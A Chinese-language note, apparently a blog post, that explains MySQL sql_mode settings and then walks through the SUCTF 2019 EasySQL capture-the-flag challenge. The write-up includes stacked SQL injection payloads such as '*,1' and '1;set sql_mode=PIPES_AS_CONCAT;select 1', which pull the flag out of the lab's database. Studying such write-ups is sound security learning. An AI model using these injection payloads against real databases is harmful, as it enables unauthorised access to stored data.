sql_mode各值及其含义

ONLY_FULL_GROUP_BY

对于GROUP BY聚合操作，如果在SELECT中的列，没有在GROUP BY中出现，那么将认为这个SQL是不合法的，因为列不在GROUP BY从句中
因为有only_full_group_by，所以我们要在MySQL中正确的使用group by语句的话，只能是select column1 from tb1 group by column1(即只能展示group by的字段，其他均都要报1055的错)

STRICT_TRANS_TABLES

在该模式下，如果一个值不能插入到一个事务表中，则中断当前的操作，对非事务表不做任何限制

NO_ZERO_IN_DATE

在严格模式，不接受月或日部分为0的日期。如果使用IGNORE选项，我们为类似的日期插入'0000-00-00'。在非严格模式，可以接受该日期，但会生成警告。

ERROR_FOR_DIVISION_BY_ZERO

在严格模式，在INSERT或UPDATE过程中，如果被零除(或MOD(X，0))，则产生错误(否则为警告)。如果未给出该模式，被零除时MySQL返回NULL。如果用到INSERT IGNORE或UPDATE IGNORE中，MySQL生成被零除警告，但操作结果为NULL

NO_AUTO_CREATE_USER

防止GRANT自动创建新用户，除非还指定了密码

NO_ENGINE_SUBSTITUTION

如果需要的存储引擎被禁用或未编译，那么抛出错误。不设置此值时，用默认的存储引擎替代，并抛出一个异常

PIPES_AS_CONCAT

将"||"视为字符串的连接操作符而非或运算符，这和Oracle数据库是一样的，也和字符串的拼接函数Concat相类似

ANSI_QUOTES

启用ANSI_QUOTES后，不能用双引号来引用字符串，因为它被解释为识别符

[SUCTF 2019]EasySQL1

一道sql注入题，有过滤，使用堆叠注入
payload尝试到了
1;show columns from Flag;
后显示Nonono，发现from被过滤
题目的查询语句为
select $_GET['query'] || flag from flag
猜出源码的大佬payload直接用的
*,1
拼出来就是
select *,1 || flag from flag
这里的||仍然作为或运算符来使用，所以后面的查询直接就执行了
官方给的方法是通过修改sql_mode为PIPES_AS_CONCAT，让||成为连接符而非或运算符
payload:
1;set sql_mode=PIPES_AS_CONCAT;select 1
拼出来就是
select 1;set sql_mode=PIPES_AS_CONCAT;select 1 || flag from flag
这里的||的效果就变成了把select 1和select flag from flag的结果拼接起来，就得到了flag